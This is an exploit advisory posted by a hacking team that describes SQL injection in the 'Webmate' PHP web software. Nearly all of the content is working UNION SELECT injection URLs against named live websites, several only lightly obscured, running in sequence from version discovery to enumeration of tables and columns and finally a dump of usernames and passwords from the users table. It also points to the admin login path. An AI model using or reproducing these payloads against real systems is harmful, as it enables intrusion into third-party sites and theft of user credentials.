#######################################################
Webmate SQL injection vulnerability.txt
#######################################################
#
# [+] Exploit Title: Webmate SQL injection vulnerability
# [+] Date: 2014 25 January
# [+] Exploit Author: Iranian_Dark_Coders_Team
# [+] Discovered By: KurD_HaCK3R
# [+] Security Risk: High
# [+] Platforms: php
# [+] Tested on: Windows 7 & kali
#
#######################################################
#
# [+] VULNERABILITY:
#
#Webmate SQL injection vulnerability
#
#######################################################
#
# [+] Demo site:
#
#http://www.fchorXsens.dk/spillerdb.php?action=show_team&id=8
#http://www.schulXstadbakeoff.dk/showproduct.php?id=-557 UNION SELECT version(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
#http://www.paasXkebroed.com/showproduct.php?id=312 UNION SELECT version(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
#######################################################
# [+] Example
#http://www.fchXorsens.dk/spillerdb.php?action=show_team&id=-8+union+select+1,2,version%28%29
#http://www.fchXorsens.dk/spillerdb.php?action=show_team&id=-8+union+select+1,2,group_concat%28table_name%29+from+information_schema.tables+where+table_schema=0x6663686F7273656E735F6462
#http://www.fchXorsens.dk/spillerdb.php?action=show_team&id=-8+union+select+1,2,group_concat%28column_name%29+from+information_schema.columns+where+table_schema=0x6663686F7273656E735F6462
#http://www.fchorsens.dk/spillerdb.php?action=show_team&id=-8+union+select+1,2,group_concat%28brugernavn,0x3a,password%29+from+users
#######################################################
# [+] Admin page : www.site.com/webmate/
#######################################################
#
# [+] Discovered By : KurD_HaCK3R
# [+] We Are : KurD_HaCK3R,M.R.S.CO,Black.Hack3r,N3O
# [+] SpTnx : YoSeF__HaCkeR,Mr.Cicili,Sec4ever,D$@d_M@n,HOt0N,MR.0x41,M4H4N,Security,@3is And All Members In wWw.IDC-TeaM.NeT
# [+] Home : http://wWw.IDC-TeaM.NeT
#
#######################################################